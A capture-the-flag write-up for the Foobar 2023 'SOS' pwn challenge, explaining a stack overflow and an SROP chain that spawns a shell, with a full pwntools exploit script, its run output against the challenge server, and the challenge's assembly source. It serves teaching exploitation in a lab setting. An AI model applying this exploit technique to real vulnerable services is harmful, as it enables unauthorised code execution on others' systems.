Tags: pwn srop 

Rating:

# SOS - Foobar 2023

The binary has no protection mechanisms enabled.

```
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
```
Futher, the binary has a stack-based buffer overflow that allows us to place our malicious gadgets directly on top of the stack, which will then be called once the main function callses at ``0x0040102f``.

```
00401000 b801000000 mov eax, 0x1
00401005 bf01000000 mov edi, 0x1
0040100a 48be002040000000…mov rsi, msg {"Please Sav"}
00401014 ba09000000 mov edx, 0x9
00401019 0f05 syscall
0040101b b800000000 mov eax, 0x0
00401020 4889e6 mov rsi, rsp {__return_addr}
00401023 bf00000000 mov edi, 0x0
00401028 ba90010000 mov edx, 0x190
0040102d 0f05 syscall
0040102f c3 retn {__return_addr}
```

However, there are few few usable gadgets in the binary.

```
0x0000000000401030: shl rax, 1; ret;
0x000000000040103d: xor rax, rax; ret;
0x0000000000401034: mov ecx, 1; xor rax, rcx; ret
0x0000000000401019: syscall;
```

``SROP`` seems like a viable exploit technique since we can control ``RAX`` and have access to a ``syscall`` instruction.

We can use the ``shlr rax, 1`` and ``mov ecx, 1; xor rax, rcx;`` instruction to set rax=15, essentially performing the following operations ``((((((1*2) xor 1)*2) xor 1)*2)+1)==15``. Well go ahead and build a ``set_rax_15()`` chain that does this.

```python
def set_rax_15():
xrxr = 0x40103d
xor1 = 0x401034
shl1 = 0x401030

chain = p64(xrxr)
chain += p64(xor1)
chain += p64(shl1)
chain += p64(xor1)
chain += p64(shl1)
chain += p64(xor1)
chain += p64(shl1)
chain += p64(xor1)
return chain
```

After that all we need to do is trigger a ``sigreturn`` by calling ``syscall``. The ``sigreturn`` syscall will restore the state of the registers from a ``SigreturnFrame``. So well go ahead and develop a sigreturn frame that sets up up for an execve() syscall by setting ``rax=0x3b``, ``rdi=0x40200b (address of /bin/sh)``, and ``rsi=rdx=0x0=NULL``. Further we'll ``RIP=syscall``, which will trigger ``execve('/bin/sh',NULL,NULL)``

```python
def srop_frame():
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = 0x40200b
frame.rsi = 0x0
frame.rdx = 0x0
frame.rip = syscall
return bytes(frame)
```

Putting it all together, our exploit looks like:

```python
from pwn import *

binary = args.BIN
context.terminal = ["tmux", "splitw", "-h"]
e = context.binary = ELF(binary)

gs = '''
continue
'''

def start():
if args.GDB:
return gdb.debug(e.path, gdbscript=gs)
elif args.REMOTE:
return remote('34.170.55.8', 1337)
else:
return process(e.path, level='error')

p = start()
syscall = 0x40102d

'''((((((1*2)+1)*2)+1)*2)+1)'''
def set_rax_15():
xrxr = 0x40103d
xor1 = 0x401034
shl1 = 0x401030

chain = p64(xrxr)
chain += p64(xor1)
chain += p64(shl1)
chain += p64(xor1)
chain += p64(shl1)
chain += p64(xor1)
chain += p64(shl1)
chain += p64(xor1)
return chain

def srop_frame():
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = 0x40200b
frame.rsi = 0x0
frame.rdx = 0x0
frame.rip = syscall
return bytes(frame)

chain = set_rax_15()
chain += p64(syscall)
chain += srop_frame()
p.sendline(chain)
p.interactive()
```

Throwing our exploit at the REMOTE server, we get the flag ``GLUG{TH4nKS_f0R_ReSp0ND1nG_7O_my_SiGNA1}``.

```
└─# python3 pwn-sos.py BIN=./chall REMOTE
[*] '/root/workspace/foobar/sos/chall'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
[+] Opening connection to 34.170.55.8 on port 1337: Done
[*] Switching to interactive mode
Please Sa$ cat flag.txt
GLUG{TH4nKS_f0R_ReSp0ND1nG_7O_my_SiGNA1}
```

The challenge authors also left the challenge source code on the remtoe server as well.

```s
global _start

section .text

__start:
_start:
mov rax, 1
mov rdi, 1
mov rsi, msg
mov rdx, 9
syscall

mov rax, 0
mov rsi, rsp
mov rdi, 0
mov rdx, 400
syscall
ret

shl rax, 1
ret

mov rcx, 1
xor rax, rcx
ret

xor rax, rax
ret

section .data
msg: db "Please Sav", 0
sh: db "/bin/sh", 0
```

Original writeup (https://raw.githubusercontent.com/tj-oconnor/ctf-writeups/main/foobar-23/sos/README.md).